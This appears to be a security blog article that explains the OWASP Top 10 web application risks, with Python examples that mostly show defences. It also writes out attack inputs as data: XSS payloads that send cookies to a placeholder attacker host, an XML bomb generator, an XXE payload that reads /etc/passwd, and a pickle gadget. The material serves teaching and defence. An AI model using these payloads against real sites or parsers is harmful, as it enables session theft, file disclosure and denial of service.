Earlier last week we discussed the SANS Top 20 application vulnerabilities. Here is another open organization's list, which ranks web application security risks by how easily they are exploited and how much damage exploitation does.

The Open Web Application Security Project (OWASP) is a non-profit organization founded in 2001 with the goal of helping website owners and security experts protect web applications from cyber attacks.

OWASP Top 10 is a widely accepted document that prioritizes the most important security risks affecting web applications. Although there are many more than ten security risks, the idea behind the OWASP Top 10 is to make security professionals keenly aware of at least the most critical security risks and learn how to defend against them.

OWASP periodically rates the important attack types by four criteria (ease of exploitation, prevalence, detectability and business impact) and selects the top ten. The OWASP Top 10 was first published in 2003 and has since been updated in 2004, 2007, 2010, 2013 and 2017; a 2021 edition is due for release.

The ranking is compiled from contributed data, community submissions and open discussion. The OWASP Top 10 list is based on eight databases from seven companies, including four consulting firms and three SaaS vendors; the combined data set contains over 500,000 vulnerabilities across hundreds of organizations and thousands of applications.

The table below compares the 2017 list with the 2021 proposal. The change column shows where each 2017 item moves in the proposal (and which items are merged); this is a proposal published ahead of the final 2021 release, so the final list may differ.

| S.No | OWASP Top 10 2017                 | 2017-2021 Change | OWASP Top 10 Proposal 2021          |
|------|-----------------------------------|------------------|-------------------------------------|
| A1   | Injection                         | No change        | Injection                           |
| A2   | Broken Authentication             | No change        | Broken Authentication               |
| A3   | Sensitive Data Exposure           | Down 1           | Cross-Site Scripting (XSS)          |
| A4   | XML External Entities (XXE)       | Down 1 + A8      | Sensitive Data Exposure             |
| A5   | Broken Access Control             | Down 1           | Insecure Deserialization            |
| A6   | Security Misconfiguration         | Down 4           | Broken Access Control               |
| A7   | Cross-Site Scripting (XSS)        | Up 4             | Insufficient Logging & Monitoring   |
| A8   | Insecure Deserialization          | Up 3 + A4        | Server-Side Request Forgery (SSRF)  |
| A9   | Known Vulnerabilities             | No change        | Known Vulnerabilities               |
| A10  | Insufficient Logging & Monitoring | Up 3             | Security Misconfiguration           |

1. SQL Injection

As a rule, application data is stored in databases that are accessed through queries, most often written in Structured Query Language (SQL). Applications use SQL queries to read, add, change or remove data, for example when a customer edits personal details or completes a questionnaire on a web page. If user-supplied input is insufficiently checked before it is placed into a query, an attacker can alter the SQL statement that the application sends to the database.

This is a serious weakness: it can give an intruder access to the database and the ability to read, modify or delete data, including confidential personal data. It is the result of insufficient validation of user input, which lets an intruder submit specially crafted values through web forms that "trick" the application into reading or writing data it should not. The reliable defence is parameterized queries (prepared statements), so that user input is always passed to the database as a value and never interpreted as part of the SQL statement.

2. Broken Authentication

To tell one user from another, a web application uses session cookies. After the user enters a login and password and authentication succeeds, a special identifier (the session ID) is saved in the browser's cookie storage, and the browser subsequently sends it to the server with every request for a page of the application. This is how the web application recognizes users.

If this identifier is stolen by an attacker and the application performs no further checks (for example binding the session to the client's IP address, or refusing more than one concurrent connection per session), the intruder can use the system under the user's account. If it is an internet bank or a payment system account, the consequences of such unauthorized access are easy to imagine. Session identifiers must therefore be unpredictable, expire after inactivity, and be replaced with a fresh value after login; note that IP binding is only a weak check, because legitimate users on mobile networks or behind NAT change addresses all the time.
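An added example of server-side session handling that implements the checks just described (it is illustrative code written for this article, not part of any framework). The idle timeout and the choice of IP address plus User-Agent as the client fingerprint are assumptions; the injectable clock exists only so the expiry logic can be exercised deterministically.

```python
import hashlib
import hmac
import secrets
import time

# Idle timeout for a session. Assumption for the example; choose per risk level.
SESSION_TTL = 15 * 60


class SessionStore:
    """Server-side session table keyed by an unguessable identifier.

    The browser only ever holds the identifier; everything about the user stays
    on the server, so a stolen cookie carries no data by itself.
    """

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock

    @staticmethod
    def _fingerprint(client_ip: str, user_agent: str) -> str:
        # Coarse binding of the session to the client. Caveat: source IPs change
        # legitimately (mobile networks, NAT pools), so treat a mismatch as a
        # reason to force re-authentication, not as proof of an attack.
        return hashlib.sha256(f"{client_ip}|{user_agent}".encode()).hexdigest()

    def create(self, user: str, client_ip: str, user_agent: str) -> str:
        # 32 random bytes from the OS CSPRNG: not sequential, not derived from
        # the user id or the time, infeasible to guess.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {
            "user": user,
            "fp": self._fingerprint(client_ip, user_agent),
            "last_seen": self._clock(),
        }
        return sid

    def lookup(self, sid: str, client_ip: str, user_agent: str):
        """Return the user for a presented session id, or None if it is invalid."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        now = self._clock()
        if now - rec["last_seen"] > SESSION_TTL:
            self.destroy(sid)  # idle for too long
            return None
        if not hmac.compare_digest(rec["fp"], self._fingerprint(client_ip, user_agent)):
            self.destroy(sid)  # presented from a different client: revoke it
            return None
        rec["last_seen"] = now
        return rec["user"]

    def rotate(self, sid: str) -> str:
        """Issue a fresh id for an existing session (after login or a privilege change).

        This defeats session fixation: an id an attacker planted before login
        stops working the moment the real user authenticates.
        """
        rec = self._sessions.pop(sid)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = rec
        return new_sid

    def destroy(self, sid: str) -> None:
        self._sessions.pop(sid, None)
```

In a real application the identifier is carried in a cookie marked `HttpOnly`, `Secure` and `SameSite`, which is covered under Security Misconfiguration below.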

3. Sensitive Data Exposure

The point is that information transmitted over plain HTTP is not encrypted in any way. When sensitive information travels from the user's device to the web server, it passes through a good many nodes: an office or home router, the provider's router, routers along the channel, a router in the data centre, and the hosting provider's server. Any of these nodes can host a 'sniffer', a program that reads all passing traffic and forwards it to the attacker, who then searches the captured data for personal information and bank card details.

A lack of encryption for confidential information such as user passwords or bank card details leaves that data open to theft. If it is encrypted in transit (HTTPS/TLS) and at rest, then even an attacker who obtains unauthorized access to the network or the server cannot read the critical data without also obtaining the keys. Passwords are a special case: they should not be encrypted at all but stored as salted, deliberately slow hashes, so that not even the application can recover them.
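An added example (not from the article) of the password-storage point, going a step beyond the text: an unsalted fast hash beside a salted PBKDF2 record with a stored work factor and a constant-time comparison. The iteration count is an assumption to be tuned on your own hardware; the record format is invented for the example.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256. Assumption for the example: tune it so one
# hash costs a noticeable fraction of a second on your production hardware.
PBKDF2_ITERATIONS = 600_000


def naive_hash(password: str) -> str:
    # What not to do: unsalted and fast. Equal passwords give equal hashes, and a
    # GPU can try billions of SHA-256 guesses per second against a stolen table.
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record, so the work factor can be raised later per user.
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        expected = bytes.fromhex(digest_hex)
        salt = bytes.fromhex(salt_hex)
        iterations = int(iters)
    except ValueError:
        return False  # malformed or tampered record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Constant-time comparison: no timing side channel on how many bytes matched.
    return hmac.compare_digest(candidate, expected)
```

Two users with the same password get different records, the database never holds anything that reverses to the password, and a stolen table forces the attacker to pay the full work factor per guess per user. Transport encryption is a server configuration matter (enable TLS, redirect HTTP, send HSTS) rather than application code, which is why it is not shown here.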

4. XML External Entities (XXE)

The biggest risk with XXE is the variety of ways in which it can be exploited. If an attacker can get an entity declaration into an XML document that the application parses, the parser can be made to read local files, send requests to internal services, or exhaust the server's resources. XML's ubiquity means that applications which process XML are likely to handle a lot of sensitive data.

The most widely known attack of this family is the 'Billion Laughs' attack, or 'XML Bomb'. This is a simple but effective denial-of-service attack used to overload and shut down a target server. By defining a chain of entities in which each one expands into many copies of the one below it, an attacker makes a few kilobytes of XML expand into gigabytes and quickly exhausts the parser's memory. Strictly speaking the bomb uses internal rather than external entities, but the defence is the same: disable DTD processing and external entity resolution in the parser, or reject any document that carries a DOCTYPE at all.
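An added example (not from the article) that builds the classic bomb, works out how large it would expand, shows the external-entity variant, and implements the "reject any DTD" defence in Python. The payloads are constructed for the demonstration; `file:///etc/passwd` is the textbook target and is never actually read here.

```python
import xml.etree.ElementTree as ET


def build_billion_laughs(depth: int = 9, fanout: int = 10, leaf: str = "lol") -> str:
    """Constructed XML bomb: entity N expands to `fanout` copies of entity N-1."""
    decls = [f'<!ENTITY lol0 "{leaf}">']
    for n in range(1, depth + 1):
        body = f"&lol{n - 1};" * fanout
        decls.append(f'<!ENTITY lol{n} "{body}">')
    dtd = "\n ".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE bomb [\n {dtd}\n]>\n<bomb>&lol{depth};</bomb>'


def expansion_size(depth: int = 9, fanout: int = 10, leaf_len: int = 3) -> int:
    """Bytes a parser must materialise if it expands the bomb naively."""
    return leaf_len * fanout ** depth


# Classic external-entity payload (constructed): a parser that resolves SYSTEM
# entities reads the file and echoes it wherever &xxe; is referenced.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<order><note>&xxe;</note></order>"
)


def parse_untrusted_xml(data: str) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document with a DTD.

    Entity bombs and external entities both need a DOCTYPE, and ordinary API
    payloads never do, so rejecting it outright removes the whole class. The
    check runs on the raw text before any parser touches the input.
    """
    if "<!DOCTYPE" in data or "<!ENTITY" in data:
        raise ValueError("DTD/entity declarations are not accepted")
    return ET.fromstring(data)


def accepts(data: str) -> bool:
    try:
        parse_untrusted_xml(data)
    except ValueError:
        return False
    return True
```

The nine-level, fan-out-ten bomb is about a kilobyte on the wire and expands to roughly 3 GB. Whether Python's own parser actually chokes on it depends on the Expat version it links against (recent Expat releases enforce an amplification limit); the pre-parse rejection does not depend on that, and the same idea is what `defusedxml` implements if you prefer a library.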

5. Broken Access Control

The essence of this OWASP Top 10 vulnerability, as the name suggests, is a lack of verification that the requester is actually allowed to access the requested object. Most web applications check permissions before displaying data in the user interface, but the same access control checks must be performed on the server for every function that is requested. There are many more auxiliary requests than page views, and they are often sent asynchronously in the background using AJAX. If their parameters (typically an object identifier) are not checked against the caller's permissions, an attacker can modify the request and access data without authorization.
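An added example (not from the article) of the server-side check: an order lookup that trusts the identifier from the request beside one that derives the caller from the session and denies by default. The order table, role table and support role are constructed for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    id: int
    owner: str
    total: float


class Forbidden(Exception):
    pass


# Constructed data and role table for the demonstration.
ORDERS = {
    1001: Order(1001, "alice", 49.90),
    1002: Order(1002, "bob", 1200.00),
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "support"}


def get_order_vulnerable(order_id: int) -> Order:
    # The handler trusts the id that arrived in the (AJAX) request. Any logged-in
    # user who changes 1001 to 1002 in the URL reads someone else's order.
    return ORDERS[order_id]


def can_view_order(user: str, order: Order) -> bool:
    # Deny by default; only the owner or a support-role user may read an order.
    return order.owner == user or ROLES.get(user) == "support"


def get_order_safe(current_user: str, order_id: int) -> Order:
    # current_user comes from the server-side session, never from the request.
    order = ORDERS.get(order_id)
    if order is None or not can_view_order(current_user, order):
        # One response for "no such order" and "not your order", so the endpoint
        # cannot be used to enumerate which ids exist.
        raise Forbidden(f"order {order_id} is not accessible")
    return order


def is_accessible(current_user: str, order_id: int) -> bool:
    try:
        get_order_safe(current_user, order_id)
    except Forbidden:
        return False
    return True
```

The check lives in the handler for every endpoint that touches the object, including the background ones the UI calls on its own; hiding a button in the interface is not access control.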

6. Security Misconfigurations

Web application security depends on every element of the infrastructure: application frameworks, all kinds of servers, and the system as a whole. The default settings of server components are often insecure and open opportunities for leaks. For example, the theft of a session cookie via JavaScript in an XSS attack is possible because the cookie's HttpOnly attribute is disabled by default. If the server is configured correctly and HttpOnly is set, the session cookie cannot be read from JavaScript, yet this simple and important setting is often missing in places as critical as the personal accounts of payment systems.
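An added example (not from the article) showing a correctly issued session cookie beside a small audit function that flags the missing attributes on any Set-Cookie header, the kind of check you would run over a site's responses. The cookie names and values are constructed; Python's `http.cookies` is used only to build the header.

```python
from http.cookies import SimpleCookie


def issue_session_cookie(sid: str) -> str:
    """Build a Set-Cookie value with the attributes a session cookie needs."""
    c = SimpleCookie()
    c["session"] = sid
    c["session"]["httponly"] = True   # invisible to document.cookie, so XSS cannot read it
    c["session"]["secure"] = True     # only ever sent over HTTPS
    c["session"]["samesite"] = "Lax"  # not attached to cross-site POSTs (CSRF)
    c["session"]["path"] = "/"
    return c.output(header="").strip()


def audit_set_cookie(header: str) -> list:
    """Return the protections missing from one Set-Cookie header value."""
    parts = [p.strip() for p in header.split(";")]
    attrs = {}
    for p in parts[1:]:  # parts[0] is name=value
        name, _, value = p.partition("=")
        attrs[name.strip().lower()] = value.strip()
    findings = []
    if "httponly" not in attrs:
        findings.append("HttpOnly missing: cookie readable from JavaScript")
    if "secure" not in attrs:
        findings.append("Secure missing: cookie sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite missing or None: cookie attached to cross-site requests")
    return findings


def audit_headers(headers: list) -> dict:
    """Audit several Set-Cookie values; keys are the cookie names."""
    return {h.split("=", 1)[0].strip(): audit_set_cookie(h) for h in headers}
```

The audit is deliberately strict about `SameSite=None`, which is a legitimate choice for cookies that must travel cross-site but is the wrong default for a session cookie.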

7. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is an injection attack in which an attacker injects malicious script into a web application so that it is executed by the browsers of other users. Once the script runs in the victim's browser, it can perform various malicious actions, such as sending private information like the session cookie from the victim's browser to the attacker. The root cause is untrusted input being written into a page without encoding appropriate to where it lands (element content, attribute value, JavaScript, URL), so the defence is context-aware output encoding.
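An added example (not from the article) rendering a constructed search page with and without HTML encoding, in two contexts: element content and a quoted attribute value. The templates, the attacker inputs and the `attacker.example` host are all constructed for the demonstration.

```python
import html

# Constructed page fragments: the first puts the input in element content, the
# second inside a quoted attribute value.
CONTENT_TEMPLATE = "<p>Search results for: {}</p>"
ATTR_TEMPLATE = '<input name="q" value="{}">'

# Constructed attacker inputs, one per context. The attribute payload closes the
# value with a quote and adds an event handler attribute of its own.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="fetch(\'https://attacker.example/?c=\' + document.cookie)'


def render_vulnerable(query: str) -> str:
    return CONTENT_TEMPLATE.format(query)  # input lands in the HTML verbatim


def render_content_safe(query: str) -> str:
    # Entity encoding for text content: <, > and & can no longer start markup.
    return CONTENT_TEMPLATE.format(html.escape(query, quote=True))


def render_attr_safe(query: str) -> str:
    # Attribute context: quote=True also encodes " and ', so the input cannot
    # close the value and smuggle in attributes such as onfocus=...
    return ATTR_TEMPLATE.format(html.escape(query, quote=True))


def contains_markup(rendered: str, template: str) -> bool:
    """Crude check: does the page contain more tags or quotes than its template?"""
    base = template.format("")
    return rendered.count("<") > base.count("<") or rendered.count('"') > base.count('"')
```

`html.escape` covers the HTML content and attribute contexts shown here; input written into a `<script>` block, an inline event handler or a URL needs that context's own encoding, which is why real templating engines select the encoder per context rather than applying one everywhere.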

8. Insecure Deserialization

Serialization and deserialization are important concepts in object-oriented frameworks such as Java and .NET, and are consequently common in many web applications. An insecure deserialization vulnerability exists when an application deserializes data without securing the process. With default settings an application has little or no control over what is deserialized; in the most extreme case any incoming serialized data from any source is deserialized without verification, and because many serialization formats let the data name the classes and methods to invoke, this can be turned into remote code execution.
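An added example (not from the article) that uses Python's `pickle` as a stand-in for the Java and .NET serializers the text mentions: a constructed "gadget" payload that runs code during loading, a restricted unpickler with an allow-list, and a data-only format as the preferred alternative. The side-effect marker replaces what a real gadget would do; the allow-list entries are arbitrary examples.

```python
import io
import json
import pickle

EXECUTED = []  # records side effects that happened while deserializing


def side_effect(marker: str) -> str:
    """Stand-in for a real gadget's action (os.system, a file write, ...)."""
    EXECUTED.append(marker)
    return marker


class Exploit:
    # pickle serializes an object by calling __reduce__; the tuple it returns
    # means "at load time, call this callable with these arguments".
    def __reduce__(self):
        return (side_effect, ("gadget ran inside pickle.loads",))


def build_malicious_payload() -> bytes:
    """Constructed attacker input: indistinguishable from any other pickle on the wire."""
    return pickle.dumps(Exploit())


def build_benign_payload() -> bytes:
    return pickle.dumps({"user": "alice", "cart": [101, 102]})


def load_unsafe(data: bytes):
    # Default behaviour: whatever callables the stream names get imported and called.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    # Allow-list of (module, name) pairs the stream may reference. Plain dicts,
    # lists, strings and numbers are built from opcodes and never reach find_class.
    ALLOWED = {("collections", "OrderedDict"), ("datetime", "date")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def load_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_json(data: bytes):
    # Better still: a data-only format that has no way to name a callable at all.
    return json.loads(data)


def restricted_rejects(data: bytes) -> bool:
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False
```

The malicious payload is never "opened" in any meaningful sense: the mere act of loading it runs the gadget, before the application can inspect the result. That is why the fix is to refuse to deserialize untrusted input into arbitrary types (allow-list, or a format like JSON), not to validate the object afterwards.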

9. Using Components with Known Vulnerabilities

Web applications are built on libraries and frameworks supplied by third parties. In most cases these components are open source, which means that not only you but millions of people around the world study their source code, and look for vulnerabilities in it too. The same goes for lower-level components of the system, such as the various servers and the parts of the operating system down to its kernel. It is very important to keep an inventory of the components you use, keep them up to date, and watch for newly published vulnerabilities that affect them.

10. Insufficient Logging and Monitoring

The problem of insufficient logging and monitoring covers the entire IT infrastructure, not just the internet-facing web application, and so does the solution. For that reason this discussion is not limited to logging and monitoring web apps. One of the primary problems is that there are so many logs: almost every contemporary system generates its own. Log management thus becomes a major task. By the time all the different logs are gathered and, preferably, correlated, the data set is far too large to monitor manually, so collection, correlation and alerting on known attack patterns have to be automated.
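An added example (not from the article) of the automated side of monitoring: a small parser and sliding-window detector run over constructed authentication log lines, raising one alert per source address when failed logins cross a threshold and labelling the pattern by how many distinct accounts were tried. The log format, the addresses (from the documentation ranges) and the thresholds are all assumptions for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log (not captured from a real system).
SAMPLE_LOG = """\
2024-03-01T10:00:01Z auth result=fail user=alice src=203.0.113.7
2024-03-01T10:00:04Z auth result=fail user=bob src=203.0.113.7
2024-03-01T10:00:07Z auth result=fail user=carol src=203.0.113.7
2024-03-01T10:00:09Z auth result=fail user=dave src=203.0.113.7
2024-03-01T10:00:12Z auth result=fail user=erin src=203.0.113.7
2024-03-01T10:00:20Z auth result=fail user=bob src=198.51.100.2
2024-03-01T10:00:25Z auth result=fail user=bob src=198.51.100.2
2024-03-01T10:00:31Z auth result=fail user=bob src=198.51.100.2
2024-03-01T10:00:38Z auth result=fail user=bob src=198.51.100.2
2024-03-01T10:00:44Z auth result=fail user=bob src=198.51.100.2
2024-03-01T10:00:50Z auth result=fail user=alice src=192.0.2.10
2024-03-01T10:00:55Z auth result=ok user=alice src=192.0.2.10
2024-03-01T10:59:00Z auth result=fail user=bob src=198.51.100.2
"""

LINE_RE = re.compile(r"^(\S+) auth result=(\w+) user=(\S+) src=(\S+)$")

# Tunable thresholds (assumptions for the demo, not values from the article).
WINDOW = timedelta(seconds=60)
FAIL_THRESHOLD = 5   # failures from one source inside WINDOW
SPRAY_USERS = 4      # distinct usernames that turn "brute force" into "spraying"


def parse(log: str) -> list:
    """Turn log lines into (timestamp, result, user, src) tuples."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # in production, count unparseable lines: they are a signal too
        ts, result, user, src = m.groups()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), result, user, src))
    return events


def detect(events: list) -> list:
    """Sliding-window detector: one alert per source when the threshold trips."""
    windows = defaultdict(deque)  # src -> deque of (time, user) for recent failures
    alerted = set()
    alerts = []
    for ts, result, user, src in sorted(events):
        if result != "fail" or src in alerted:
            continue
        w = windows[src]
        w.append((ts, user))
        while ts - w[0][0] > WINDOW:  # drop failures older than the window
            w.popleft()
        if len(w) >= FAIL_THRESHOLD:
            users = {u for _, u in w}
            kind = "password_spraying" if len(users) >= SPRAY_USERS else "brute_force"
            alerts.append({"src": src, "kind": kind, "failures": len(w),
                           "users": sorted(users), "at": ts.isoformat()})
            alerted.add(src)
    return alerts
```

The same skeleton carries over to other signals in the logs (HTTP 403 bursts from one client, repeated `'` characters in query strings, a sudden volume of 5xx errors); what matters is that every relevant event is logged with a timestamp, the source, the account and the outcome, shipped to a central place, and matched against rules automatically rather than read by a person.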

Final Thoughts

The security of most web apps remains poor: every second web application contains high-risk weaknesses from the OWASP Top 10 list. However, the share of web applications with critical vulnerabilities is gradually decreasing. Another positive trend is that organizations are starting to pay more attention to the protection of their apps, not only public ones but also those used for internal needs. The number of web application breaches will decline if identified vulnerabilities are fixed as early as possible and processes are automated wherever possible.

Web applications are constantly updated, and along with new features new vulnerabilities may appear, to be included in the next update of the OWASP Top 10. Cybersecurity protection services must not only detect and prevent known attacks on applications but also identify the exploitation of zero-day vulnerabilities, prevent attacks on users, and analyze and correlate events to follow attack chains.